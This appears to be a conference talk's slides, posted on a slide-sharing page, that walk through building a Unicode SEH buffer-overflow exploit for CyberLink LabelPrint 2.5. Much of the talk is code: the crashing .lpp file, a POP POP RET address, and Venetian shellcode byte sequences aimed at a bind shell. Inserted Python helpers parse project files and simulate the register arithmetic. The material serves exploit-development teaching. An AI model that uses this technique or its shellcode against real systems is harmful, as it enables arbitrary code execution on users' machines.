Exploit Development
Cyberlink LabelPrint 2.5 Unicode Stack Overflow
IT Audit & IT Security Meetup #4 - Sharing in the Cloud
Indonesian Cloud, Jakarta, 13 October 2017
Who?
 Thomas Gregory - @modpr0be
 IT Security consultant @Spentera
 Security researcher (occasionally)
 focus on Windows exploitation
 IT Security trainer (sometimes)
 f3ci - ????
 Security researcher
 Penetration tester, red team
 Appsec & simple exploit dev
What?
 CyberLink LabelPrint 2.5
 Labeling software
 Embedded by default in the CyberLink Power2Go installation.
 Included as bloatware in all Lenovo, HP, Asus laptops somewhere between 2015-2016.
Why?
 The exploit development is quite challenging and interesting
 We want to share it for education purposes only.
Let’s Begin
THE FUZZ
Fuzzing possibility
 File Input
 import
 open media
 open project
 Registry overflow
Tools
 Immunity Debugger
 with mona plugin
 Editor/IDE
 /me using sublime text
LabelPrint Project
 Project file with extension .lpp
 Header
<PROJECT version="1.0.00">
<INFORMATION title="" author="" date="7/24/2017" SystemTime="24/07/2017">
<TRACK name="" />
The Bug
 In the name attribute of the TRACK tag
<PROJECT version="1.0.00">
<INFORMATION title="" author="" date="7/24/2017" SystemTime="24/07/2017">
<TRACK
name="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA" />
</INFORMATION>
</PROJECT>
SEH Overwritten
 Overwritten SE Handler
Unicode Based
 "AA" (0x4141) becomes ".A.A" (0x00410041) once the input is converted to Unicode
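As an added example (not part of the talk), a small script that parses a project like the one on the slides and models the ANSI-to-Unicode widening the slide refers to, so the TRACK name can be checked before a file is opened. The sample project and the 256-character threshold are constructed assumptions.

```python
"""Added example: inspect a .lpp project for an oversized TRACK name and show
the Unicode widening that turns "AA" (41 41) into 00 41 00 41. Not the talk's
code; the sample project and the length threshold are constructed."""
import struct
import xml.etree.ElementTree as ET

# Constructed sample with the same structure as the header on the slides.
SAMPLE_LPP = (
    '<PROJECT version="1.0.00">'
    '<INFORMATION title="" author="" date="7/24/2017" SystemTime="24/07/2017">'
    '<TRACK name="' + "A" * 900 + '" />'
    "</INFORMATION></PROJECT>"
)


def widen(text):
    """Model the application's ANSI -> Unicode (UTF-16LE) conversion: 'A' -> 41 00."""
    return text.encode("utf-16-le")


def dword_at(text, offset):
    """Dword the widened value leaves at a byte offset, e.g. what lands in an SEH slot."""
    return struct.unpack_from("<I", widen(text), offset)[0]


def track_names(lpp_xml):
    """[(chars, widened_bytes), ...] for every TRACK element in the project."""
    root = ET.fromstring(lpp_xml)
    return [(len(t.get("name", "")), len(widen(t.get("name", ""))))
            for t in root.iter("TRACK")]


def is_oversized(lpp_xml, limit=256):
    """Defensive pre-check: flag any TRACK name longer than an assumed safe limit."""
    return any(chars > limit for chars, _ in track_names(lpp_xml))


if __name__ == "__main__":
    print("AAAA widened:", widen("AAAA").hex())               # 4100410041004100
    print("dword at offset 0: %#010x" % dword_at("AAAA", 0))  # 0x00410041
    print("TRACK names (chars, widened bytes):", track_names(SAMPLE_LPP))
    print("oversized:", is_oversized(SAMPLE_LPP))
```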
What is SEH?
 a piece of code that is written inside an
application, with the purpose of dealing with the
fact that the application throws an exception
(taken from corelan)
 an exception is an event, which occurs during the
execution of a program, that disrupts the normal
flow of the program's instructions.
 a catcher, who is trying to catch unusual
behavior.
What is SEH?
This structure (also called a SEH record) is 8 bytes and has two 4-byte elements:
 a pointer to the next exception registration structure (in essence, to the next SEH record, in case the current handler is unable to handle the exception)
 a pointer to the address of the actual code of the exception handler (SE Handler)
Abusing SEH
In other words, the payload must do the following
things:
 Cause an exception. Without an exception, the SEH
handler (the one you have overwritten/control)
won’t kick in.
 Overwrite the pointer to the next SEH record with
some jumpcode (so it can jump to the shellcode)
 Overwrite the SE handler with a pointer to an
instruction that will bring you back to next SEH and
execute the jumpcode.
 The shellcode should be directly after the overwritten SE Handler; the small jumpcode contained in the overwritten "pointer to next SEH record" will jump to it.
Abusing SEH
 When the exception occurs, the stack looks like this:
 A suitable value to overwrite the SE Handler with is the address of a POP something, POP something, RETN sequence.
 It POPs the address sitting at the top of the stack, POPs again to take the second address, and RETNs to execute the third address (which is now at the top of the stack)
 The third address is usually in our supplied input buffer
(Diagram: the stack at exception time, labelled "Top of stack" and "Our pointer to next SEH address")
Abusing SEH
Image was taken from http://corelan.be
with permission from Peter van Eeckhoutte (Corelan)
Unicode?
 Unicode allows us to visually represent and/or manipulate text in most of the systems across the world in a consistent manner.
 Unicode-based exploits usually involve:
 file/folder naming
 input parameters that deal with naming
More Info
 Structured Exception Handler (SEH)
 https://msdn.microsoft.com/en-us/library/windows/desktop/ms680657(v=vs.85).aspx
 https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/
 https://blog.spentera.com/2011/09/14/seh-based-stack-overflow-the-basic/
 Unicode based exploit
 https://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/
SEH + Unicode = Venetian
PROBABLY THE MOST HATED COMBINATION
Venetian Shellcode
 One of the registers must point at the beginning of the shellcode.
 One register must point at a memory location that is writeable (and where it's OK to write the newly reassembled shellcode)
 A normal Venetian prepend sequence:
 Push another register onto the stack (ESP)
 Pop the stack (ESP) into EAX
 Align the EAX register with add/sub instructions
 Push the EAX register onto the stack (ESP)
 RET (return to the beginning of the shellcode at EAX)
 Sadly, we won't be dealing with a normal Venetian approach here
Typical Venetian Unicode Prepend Opcode (diagram):
 Align EAX register: if we use EAX as BufferRegister, we need to align EAX to point to our buffer.
 "Stack walking": walk over the Next SEH and SEH.
 RET to shellcode: shellcode executed.
Typical Venetian Unicode Prepend Opcode
ven = "\x56" #push esi
ven += "\x41" #align
ven += "\x58" #pop eax
ven += "\x41" #align
ven += "\x05\x04\x01" #add eax,01000400
ven += "\x41" #align
ven += "\x2d\x01\x01" #sub eax,01000100
ven += "\x41" #align
ven += "\x50" #push eax
ven += "\x41" #align
ven += "\xc3" #ret
(The add/sub values depend on where our buffer is; EAX is used as the BufferRegister.)
Problem?
 Limited instructions (because of Unicode)
 Need to find a Unicode-friendly POP POP RET
 All byte values between 0x80 and 0xFF are marked as bad
 Yes, the RET opcode (C3) is also on the bad character list.
 Meanwhile, our Venetian shellcode needs a RET
 Typical Venetian: Sh*t!
Solution
 Find a proper Unicode-friendly PPR (pop pop ret) instruction address somewhere in a library or the executable
 Create "our version" of RET
 Fill the stack (ESP) with our shellcode
 Point our RET at a CALL ESP instruction address
 This will alter the flow of execution.
 EAX must point to the beginning of our shellcode.
 "Stack walk" until we meet the shellcode.
Our Venetian Unicode Shellcode (diagram):
 Align EAX register
 Calculate where RET will be placed
 Construct RET in EAX
 Calculate EAX for the CALL ESP opcode
 Reaching RET, execute CALL ESP
 Re-align EAX
 "Stack walk" to shellcode
 Bind shell on port 4444
pop pop ret
 !mona seh
 Fortunately, we found one Unicode-friendly address (0x0044002c) in the main program (LabelPrint.exe)
Construct RET (1)
 Calculate the value of the EAX register, preparing the address where we want the decoded RET to be placed later on the stack.
 Limited calculation (because of Unicode)
 Zero the EAX register first
 xor eax,eax
Construct RET (2)
Preparing the address at which to push our RET:
 push esp
 pop eax
 add 01001B00 to the EAX register
 sub 01000100 from the EAX register
 push EAX
 pop ESP
ven += "\x42" #nop
ven += "\x54" #push esp
ven += "\x42" #nop
ven += "\x58" #pop eax
ven += "\x42" #nop
ven += "\x05\x1B\x01" #add eax,01001B00
ven += "\x42" #nop
ven += "\x2d\x01\x01" #sub eax,01000100
ven += "\x42" #nop
ven += "\x50" #push eax
ven += "\x42" #nop
ven += "\x5c" #pop esp
Construct RET (3)
 After the calculation in EAX, the stack pointer (ESP) now points at 0x0012F655 (the same value as EAX)
 This is important for our RET decoding address later.
Construct RET (4)
Zeroing Out EAX
 We need to clear the EAX register before calculating the RET opcode.
 Once EAX is zeroed out we can calculate the EAX register to reach 0xC300C300 (the RET opcode).
 We can perform the calculation with AND instructions:
 AND EAX register with 7e007e00
 AND EAX register with 01000100
Zeroing Out EAX
ven += "\x42" #nop
ven += "\x25\x7e\x7e" #and eax,7e007e00
ven += "\x42" #nop
ven += "\x25\x01\x01" #and eax,01000100
Construct RET (5)
Preparing RET opcode:
 Zeroing Out EAX first (done)
 XOR EAX register with 7f007f00
 ADD EAX register with 44004400
 PUSH EDI
 PUSH EAX
The RET Opcode (1)
ven += "\x35\x7f\x7f" #xor eax,7f007f00
ven += "\x42" #nop
ven += "\x05\x44\x44" #add eax,44004400
ven += "\x42" #nop
ven += "\x57" #push edi/padding
ven += "\x42" #nop
ven += "\x50" #push eax
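To verify the arithmetic on the Construct RET slides without a debugger, here is an added example (not the talk's code or the exploit-db entry): it widens the slide's byte strings to UTF-16LE exactly as the application does and steps through the few instructions they use, tracking EAX and a toy stack. The starting ESP (0x0012DC55, chosen so ESP lands on the slide's 0x0012F655), the EDI value and the alignment byte placed between the zeroing and XOR sequences are assumptions.

```python
"""Added example: simulate the Venetian EAX arithmetic from the Construct RET
slides. Not code from the talk or the final exploit; starting register values
are constructed."""
import struct

MASK = 0xFFFFFFFF

# Slide sequences with backslashes restored. Each is an excerpt that follows an
# earlier instruction, so a widened null (00) is pending when it starts.
ADDR_CALC = "\x42\x54\x42\x58\x42\x05\x1B\x01\x42\x2d\x01\x01\x42\x50\x42\x5c"
ZERO_EAX = "\x42\x25\x7e\x7e\x42\x25\x01\x01"
# The leading \x42 is an ASSUMED alignment byte between the two slide excerpts.
BUILD_RET = "\x42\x35\x7f\x7f\x42\x05\x44\x44\x42\x57\x42\x50"


def widen(ascii_payload):
    """The application widens every input byte to a UTF-16LE code unit (56 -> 56 00)."""
    return ascii_payload.encode("utf-16-le")


def bad_chars(ascii_payload):
    """Slide constraint: 0x80-0xFF (which includes RET, 0xC3) cannot be used."""
    return sorted({ord(c) for c in ascii_payload if ord(c) >= 0x80})


class Cpu:
    """Toy 32-bit state: EAX, ESP, fixed ESI/EDI and a dword-addressed stack."""

    def __init__(self, esp, esi=0, edi=0):
        self.eax, self.esi, self.edi, self.esp = 0, esi, edi, esp
        self.mem = {}

    def push(self, val):
        self.esp = (self.esp - 4) & MASK
        self.mem[self.esp] = val & MASK

    def pop(self):
        val = self.mem.get(self.esp, 0)
        self.esp = (self.esp + 4) & MASK
        return val

    def run(self, ascii_payload, null_pending=True):
        bad = bad_chars(ascii_payload)
        if bad:
            raise ValueError("payload contains bad chars: %r" % bad)
        code = (b"\x00" if null_pending else b"") + widen(ascii_payload)
        i = 0
        while i < len(code):
            op = code[i]
            if op == 0x00:
                # 00 /r with disp8, e.g. 00 42 00 = add [edx+0], al: the Venetian
                # filler that absorbs the inserted null. Its memory write is ignored.
                i += 3
            elif op in (0x41, 0x42):              # inc ecx / inc edx: harmless
                i += 1
            elif op in (0x05, 0x2D, 0x25, 0x35):  # add/sub/and/xor eax, imm32
                imm = struct.unpack_from("<I", code, i + 1)[0]
                if op == 0x05:
                    self.eax = (self.eax + imm) & MASK
                elif op == 0x2D:
                    self.eax = (self.eax - imm) & MASK
                elif op == 0x25:
                    self.eax &= imm
                else:
                    self.eax ^= imm
                i += 5
            elif op == 0x50:                      # push eax
                self.push(self.eax)
                i += 1
            elif op == 0x54:                      # push esp (pushes the old ESP)
                self.push(self.esp)
                i += 1
            elif op == 0x56:                      # push esi
                self.push(self.esi)
                i += 1
            elif op == 0x57:                      # push edi
                self.push(self.edi)
                i += 1
            elif op == 0x58:                      # pop eax
                self.eax = self.pop()
                i += 1
            elif op == 0x5C:                      # pop esp
                self.esp = self.pop()
                i += 1
            else:
                raise NotImplementedError("opcode %#04x at offset %d" % (op, i))


def run_sequences(seqs, initial_esp, edi=0x11111111):
    """Run slide sequences in order from a constructed initial state; return the Cpu."""
    cpu = Cpu(esp=initial_esp, edi=edi)
    for seq in seqs:
        cpu.run(seq)
    return cpu


def construct_ret(initial_esp):
    """Address calculation, zeroing and RET construction, as on the slides."""
    return run_sequences((ADDR_CALC, ZERO_EAX, BUILD_RET), initial_esp)


if __name__ == "__main__":
    cpu = construct_ret(0x0012DC55)   # constructed so ESP becomes 0x0012F655
    print("EAX = %#010x" % cpu.eax)                         # 0xc300c300
    print("dword at ESP %#010x = %#010x" % (cpu.esp, cpu.mem[cpu.esp]))
```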
The RET Opcode (2)
Construct CALL to ESP (1)
Construct CALL to ESP (2)
Construct CALL to ESP (3)
Stack Walk to Shellcode
Our Venetian Shellcode
ven += "\x58" #pop eax
ven += "\x42" #nop
ven += "\x58" #pop eax
ven += "\x42" #nop
ven += "\x05\x10\x01" #add eax,01001000, align eax to our buffer
ven += "\x42" #nop
ven += "\x2d\x0e\x01" #sub eax,01000e00, align eax to our buffer
ven += "\x42" #nop
ven += "\x50" #push eax
ven += "\x42" #nop
ven += "\x5C" #pop esp
ven += "\x42" #nop
ven += "\x58" #pop eax
ven += "\x42" #nop
ven += "\x05\x53\x7c" #add eax,7c005300 part of call esp
ven += "\x42" #nop
ven += "\x50" #push eax
ven += "\x42" * 68 #padding to fill the stack
ven += "\x7b\x32" #part of call esp
Final Exploit
https://www.exploit-db.com/exploits/42777/
Solution
 For now, do not use CyberLink LabelPrint.
Thank you
research@spentera.id

More Related Content

What's hot

Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Vincenzo Iozzo
 
Exploit techniques - a quick review
Exploit techniques - a quick reviewExploit techniques - a quick review
Exploit techniques - a quick review
Ce.Se.N.A. Security
 
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP ChainsExploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Ajin Abraham
 
Javascript: The Important Bits
Javascript: The Important BitsJavascript: The Important Bits
Javascript: The Important Bits
Zumba Fitness - Technology Team
 
Operating System Assignment Help
Operating System Assignment HelpOperating System Assignment Help
Operating System Assignment Help
Programming Homework Help
 
Introduction to Perl Programming
Introduction to Perl ProgrammingIntroduction to Perl Programming
Introduction to Perl Programming
Collaboration Technologies
 
Basic ASM by @binaryheadache
Basic ASM by @binaryheadacheBasic ASM by @binaryheadache
Basic ASM by @binaryheadache
camsec
 
Computer Science Assignment Help
Computer Science Assignment HelpComputer Science Assignment Help
Computer Science Assignment Help
Programming Homework Help
 
How to Make an Echo Server
How to Make an Echo ServerHow to Make an Echo Server
How to Make an Echo Server
adil raja
 
Seh based attack
Seh based attackSeh based attack
Seh based attack
Mihir Shah
 
Programming Assignment Help
Programming Assignment HelpProgramming Assignment Help
Programming Assignment Help
Programming Homework Help
 
merged_document_3
merged_document_3merged_document_3
merged_document_3
tori hoff
 
Perl IO
Perl IOPerl IO
Perl IO
guest998254
 
Computer Science Homework Help
Computer Science Homework HelpComputer Science Homework Help
Computer Science Homework Help
Programming Homework Help
 
Process management
Process managementProcess management
Process management
Utkarsh Kulshrestha
 
Operating System Engineering Quiz
Operating System Engineering QuizOperating System Engineering Quiz
Operating System Engineering Quiz
Programming Homework Help
 
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterExploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 Egghunter
Ajin Abraham
 
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit DevelopmentExploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Ajin Abraham
 
Remote Command Execution
Remote Command ExecutionRemote Command Execution
Remote Command Execution
adil raja
 
Reverse Engineering: C++ "for" operator
Reverse Engineering: C++ "for" operatorReverse Engineering: C++ "for" operator
Reverse Engineering: C++ "for" operator
erithion
 

What's hot (20)

Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
 
Exploit techniques - a quick review
Exploit techniques - a quick reviewExploit techniques - a quick review
Exploit techniques - a quick review
 
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP ChainsExploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
 
Javascript: The Important Bits
Javascript: The Important BitsJavascript: The Important Bits
Javascript: The Important Bits
 
Operating System Assignment Help
Operating System Assignment HelpOperating System Assignment Help
Operating System Assignment Help
 
Introduction to Perl Programming
Introduction to Perl ProgrammingIntroduction to Perl Programming
Introduction to Perl Programming
 
Basic ASM by @binaryheadache
Basic ASM by @binaryheadacheBasic ASM by @binaryheadache
Basic ASM by @binaryheadache
 
Computer Science Assignment Help
Computer Science Assignment HelpComputer Science Assignment Help
Computer Science Assignment Help
 
How to Make an Echo Server
How to Make an Echo ServerHow to Make an Echo Server
How to Make an Echo Server
 
Seh based attack
Seh based attackSeh based attack
Seh based attack
 
Programming Assignment Help
Programming Assignment HelpProgramming Assignment Help
Programming Assignment Help
 
merged_document_3
merged_document_3merged_document_3
merged_document_3
 
Perl IO
Perl IOPerl IO
Perl IO
 
Computer Science Homework Help
Computer Science Homework HelpComputer Science Homework Help
Computer Science Homework Help
 
Process management
Process managementProcess management
Process management
 
Operating System Engineering Quiz
Operating System Engineering QuizOperating System Engineering Quiz
Operating System Engineering Quiz
 
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterExploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 Egghunter
 
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit DevelopmentExploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
 
Remote Command Execution
Remote Command ExecutionRemote Command Execution
Remote Command Execution
 
Reverse Engineering: C++ "for" operator
Reverse Engineering: C++ "for" operatorReverse Engineering: C++ "for" operator
Reverse Engineering: C++ "for" operator
 

Similar to CyberLink LabelPrint 2.5 Exploitation Process

Shellcode Disassembling - Reverse Engineering
Shellcode Disassembling - Reverse EngineeringShellcode Disassembling - Reverse Engineering
Shellcode Disassembling - Reverse Engineering
Sumutiu Marius
 
Return Oriented Programming (ROP) Based Exploits - Part I
Return Oriented Programming  (ROP) Based Exploits  - Part IReturn Oriented Programming  (ROP) Based Exploits  - Part I
Return Oriented Programming (ROP) Based Exploits - Part I
n|u - The Open Security Community
 
Heap overflows for humans – 101
Heap overflows for humans – 101Heap overflows for humans – 101
Heap overflows for humans – 101
Craft Symbol
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
amiable_indian
 
Exploit Development with Python
Exploit Development with PythonExploit Development with Python
Exploit Development with Python
Thomas Gregory
 
Buffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the StackBuffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the Stack
ironSource
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploits
hughpearse
 
Buffer overflow – Smashing The Stack
Buffer overflow – Smashing The StackBuffer overflow – Smashing The Stack
Buffer overflow – Smashing The Stack
Tomer Zait
 
Dive into exploit development
Dive into exploit developmentDive into exploit development
Dive into exploit development
Payampardaz
 
Virtual machine re building
Virtual machine re buildingVirtual machine re building
Virtual machine re building
Martin Dominguez Alvarez
 
Shellcoding in linux
Shellcoding in linuxShellcoding in linux
Shellcoding in linux
Ajin Abraham
 
Listen afup 2010
Listen afup 2010Listen afup 2010
Listen afup 2010
Gabriele Santini
 
The Stack and Buffer Overflows
The Stack and Buffer OverflowsThe Stack and Buffer Overflows
The Stack and Buffer Overflows
UTD Computer Security Group
 
08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one
Alexandre Moneger
 
exploiting heap overflows
exploiting heap overflowsexploiting heap overflows
exploiting heap overflows
primelude
 
Creating a Fibonacci Generator in Assembly - by Willem van Ketwich
Creating a Fibonacci Generator in Assembly - by Willem van KetwichCreating a Fibonacci Generator in Assembly - by Willem van Ketwich
Creating a Fibonacci Generator in Assembly - by Willem van Ketwich
Willem van Ketwich
 
Packers
PackersPackers
Generacion de codigo ensamblado
Generacion de codigo ensambladoGeneracion de codigo ensamblado
Generacion de codigo ensamblado
tre_na_gil
 
NDC TechTown 2023_ Return Oriented Programming an introduction.pdf
NDC TechTown 2023_ Return Oriented Programming an introduction.pdfNDC TechTown 2023_ Return Oriented Programming an introduction.pdf
NDC TechTown 2023_ Return Oriented Programming an introduction.pdf
Patricia Aas
 
Reversing & Malware Analysis Training Part 4 - Assembly Programming Basics
Reversing & Malware Analysis Training Part 4 - Assembly Programming BasicsReversing & Malware Analysis Training Part 4 - Assembly Programming Basics
Reversing & Malware Analysis Training Part 4 - Assembly Programming Basics
securityxploded
 

Similar to CyberLink LabelPrint 2.5 Exploitation Process (20)

Shellcode Disassembling - Reverse Engineering
Shellcode Disassembling - Reverse EngineeringShellcode Disassembling - Reverse Engineering
Shellcode Disassembling - Reverse Engineering
 
Return Oriented Programming (ROP) Based Exploits - Part I
Return Oriented Programming  (ROP) Based Exploits  - Part IReturn Oriented Programming  (ROP) Based Exploits  - Part I
Return Oriented Programming (ROP) Based Exploits - Part I
 
Heap overflows for humans – 101
Heap overflows for humans – 101Heap overflows for humans – 101
Heap overflows for humans – 101
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
 
Exploit Development with Python
Exploit Development with PythonExploit Development with Python
Exploit Development with Python
 
Buffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the StackBuffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the Stack
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploits
 
Buffer overflow – Smashing The Stack
Buffer overflow – Smashing The StackBuffer overflow – Smashing The Stack
Buffer overflow – Smashing The Stack
 
Dive into exploit development
Dive into exploit developmentDive into exploit development
Dive into exploit development
 
Virtual machine re building
Virtual machine re buildingVirtual machine re building
Virtual machine re building
 
Shellcoding in linux
Shellcoding in linuxShellcoding in linux
Shellcoding in linux
 
Listen afup 2010
Listen afup 2010Listen afup 2010
Listen afup 2010
 
The Stack and Buffer Overflows
The Stack and Buffer OverflowsThe Stack and Buffer Overflows
The Stack and Buffer Overflows
 
08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one
 
exploiting heap overflows
exploiting heap overflowsexploiting heap overflows
exploiting heap overflows
 
Creating a Fibonacci Generator in Assembly - by Willem van Ketwich
Creating a Fibonacci Generator in Assembly - by Willem van KetwichCreating a Fibonacci Generator in Assembly - by Willem van Ketwich
Creating a Fibonacci Generator in Assembly - by Willem van Ketwich
 
Packers
PackersPackers
Packers
 
Generacion de codigo ensamblado
Generacion de codigo ensambladoGeneracion de codigo ensamblado
Generacion de codigo ensamblado
 
NDC TechTown 2023_ Return Oriented Programming an introduction.pdf
NDC TechTown 2023_ Return Oriented Programming an introduction.pdfNDC TechTown 2023_ Return Oriented Programming an introduction.pdf
NDC TechTown 2023_ Return Oriented Programming an introduction.pdf
 
Reversing & Malware Analysis Training Part 4 - Assembly Programming Basics
Reversing & Malware Analysis Training Part 4 - Assembly Programming BasicsReversing & Malware Analysis Training Part 4 - Assembly Programming Basics
Reversing & Malware Analysis Training Part 4 - Assembly Programming Basics
 

Recently uploaded

Alluxio Webinar | What’s new in Alluxio Enterprise AI 3.2: Leverage GPU Anywh...
Alluxio Webinar | What’s new in Alluxio Enterprise AI 3.2: Leverage GPU Anywh...Alluxio Webinar | What’s new in Alluxio Enterprise AI 3.2: Leverage GPU Anywh...
Alluxio Webinar | What’s new in Alluxio Enterprise AI 3.2: Leverage GPU Anywh...
Alluxio, Inc.
 
Full stack odoo development solutions provided by Fortune 500 trusted supplier
Full stack odoo development solutions provided by Fortune 500 trusted supplierFull stack odoo development solutions provided by Fortune 500 trusted supplier
Full stack odoo development solutions provided by Fortune 500 trusted supplier
Odoo Red
 
SOCRadar's Hand Guide For the 2024 Paris Olympics--.pdf
SOCRadar's Hand Guide For the 2024 Paris Olympics--.pdfSOCRadar's Hand Guide For the 2024 Paris Olympics--.pdf
SOCRadar's Hand Guide For the 2024 Paris Olympics--.pdf
SOCRadar
 
Maturity Model Presentation from Open Compliance Summit 2023
Maturity Model Presentation from Open Compliance Summit 2023Maturity Model Presentation from Open Compliance Summit 2023
Maturity Model Presentation from Open Compliance Summit 2023
Shane Coughlan
 
Cloud Databases and Big Data - Mechlin.pptx
Cloud Databases and Big Data - Mechlin.pptxCloud Databases and Big Data - Mechlin.pptx
Cloud Databases and Big Data - Mechlin.pptx
Mitchell Marsh
 
How Odoo Accounting Can Save Your Business, Time and Money.pdf
How Odoo Accounting Can Save Your Business, Time and Money.pdfHow Odoo Accounting Can Save Your Business, Time and Money.pdf
How Odoo Accounting Can Save Your Business, Time and Money.pdf
Banibro IT Solutions
 
Moder Java-WeAreDevelopers - Berlin - 2024.pdf
Moder Java-WeAreDevelopers - Berlin - 2024.pdfModer Java-WeAreDevelopers - Berlin - 2024.pdf
Moder Java-WeAreDevelopers - Berlin - 2024.pdf
RonVeen1
 
My Bully Is My Lover Apk CH1 EP4 (Gallery Unlock, MOD)
My Bully Is My Lover Apk CH1 EP4 (Gallery Unlock, MOD)My Bully Is My Lover Apk CH1 EP4 (Gallery Unlock, MOD)
My Bully Is My Lover Apk CH1 EP4 (Gallery Unlock, MOD)
Apk2me
 
JavaScript API Deprecation in the Wild: A First Assessment (SANER 2020)
JavaScript API Deprecation in the Wild: A First Assessment (SANER 2020)JavaScript API Deprecation in the Wild: A First Assessment (SANER 2020)
JavaScript API Deprecation in the Wild: A First Assessment (SANER 2020)
Andre Hora
 
How to Choose the Right Partner for Outsource Website Development
How to Choose the Right Partner for Outsource Website DevelopmentHow to Choose the Right Partner for Outsource Website Development
How to Choose the Right Partner for Outsource Website Development
Rollout IT
 
The two flavors of Python 3.13 - PyHEP 2024
The two flavors of Python 3.13 - PyHEP 2024The two flavors of Python 3.13 - PyHEP 2024
The two flavors of Python 3.13 - PyHEP 2024
Henry Schreiner
 
Limited Time Offer! Pay One Time to Access to Sociosight for Only $95
Limited Time Offer! Pay One Time to Access to Sociosight for Only $95Limited Time Offer! Pay One Time to Access to Sociosight for Only $95
Limited Time Offer! Pay One Time to Access to Sociosight for Only $95
Sri Damayanti
 
Asset Management software Technologies.pdf
Asset Management software Technologies.pdfAsset Management software Technologies.pdf
Asset Management software Technologies.pdf
Hr365.us smith
 
Viswanath_Cover letter_Scrum Master_10+yrs
Viswanath_Cover letter_Scrum Master_10+yrsViswanath_Cover letter_Scrum Master_10+yrs
Viswanath_Cover letter_Scrum Master_10+yrs
cviswanathsai
 
CrushFTP 10.4.0.29 PC Software - WhizNews
CrushFTP 10.4.0.29 PC Software - WhizNewsCrushFTP 10.4.0.29 PC Software - WhizNews
CrushFTP 10.4.0.29 PC Software - WhizNews
Eman Nisar
 
Gurugram Meetup Salesforce integration patterns - 20 July 2024.pptx
Gurugram Meetup Salesforce integration patterns - 20 July 2024.pptxGurugram Meetup Salesforce integration patterns - 20 July 2024.pptx
Gurugram Meetup Salesforce integration patterns - 20 July 2024.pptx
Gupta Pryank
 
Healthcare software development made easy_ A step-by-step guide.pdf
Healthcare software development made easy_ A step-by-step guide.pdfHealthcare software development made easy_ A step-by-step guide.pdf
Healthcare software development made easy_ A step-by-step guide.pdf
mohitd6
 
Software Development Company in Florida.pdf
Software Development Company in Florida.pdfSoftware Development Company in Florida.pdf
Software Development Company in Florida.pdf
Getweys
 
Availability and Usage of Platform-Specific APIs: A First Empirical Study (MS...
